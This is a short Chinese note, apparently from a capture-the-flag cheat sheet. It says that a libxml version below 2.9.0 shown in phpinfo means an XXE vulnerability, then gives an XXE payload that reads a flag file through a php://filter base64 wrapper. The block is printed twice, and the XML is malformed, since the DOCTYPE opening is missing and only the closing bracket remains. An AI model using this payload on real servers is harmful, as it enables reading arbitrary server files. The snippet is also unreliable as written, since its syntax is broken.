如果遇见phpinfo 中libxm的版本 < 2.9.0时,存在XXE漏洞
playload:
<?xml version="1.0" encoding="utf-8"?><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
&xxe;
如果遇见phpinfo 中libxm的版本 < 2.9.0时,存在XXE漏洞
playload:
<?xml version="1.0" encoding="utf-8"?><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
&xxe;